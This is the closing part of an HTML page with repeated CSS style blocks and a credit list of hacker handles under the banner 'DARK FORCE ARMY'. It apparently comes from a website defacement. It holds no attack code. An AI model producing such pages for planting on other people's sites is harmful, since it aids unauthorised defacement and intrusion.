(max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}</style> 
        <style type="text/css">html,body{height:100%;margin:0;padding:0}ul,li{text-indent:0;text-decoration:none;margin:0;padding:0}img{border:0}body{background-color:#000;color:#999;font:100%/18px helvetica,arial,sans-serif}canvas{cursor:crosshair;display:block;left:0;position:absolute;top:0;z-index:20}#header img{width:100%;height:20%}#bg img{width:100%;height:80%}#header,#bg{position:fixed;left:0;right:0;z-index:10}#header{top:0}#bg{position:fixed;z-index:1;bottom:0}audio{position:fixed;display:none;bottom:0;left:0;right:0;width:100%;z-index:5}.webdesign{width:30%;position:absolute;top:0;left:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}.webdesign2{position:absolute;top:0;right:0;font-family:tahoma;text-decoration:none;color:#232323;font-size:11px}#bgimg{display:none}#bgimg1{display:block}@media screen and (max-width:500px){#bgimg1{display:none}#bgimg{display:block}}
     </style>
<style type="text/css">
  h5 {
   font-family: iceberg;
   decoration: none;
   font-size: 18px;
}
 </style>
<h5><font color="#FFDAB9"><q>./DarkSkull7 <font color="aqua">—</font> ./CrazyRemi <font color="aqua">—</font> Notwork <font color="aqua">—</font> Xerx <font color="aqua">—</font> Cell <font color="aqua">—</font><font color="aqua">—</font> Mr O1b4rs </q><br><br> <font color="chartreuse"><u>DARK FORCE ARMY</u></font></font></h5>
       </div> 
      </center></td> 
    </tr> 
   </tbody> 
  </table> 
 </body>
</html>
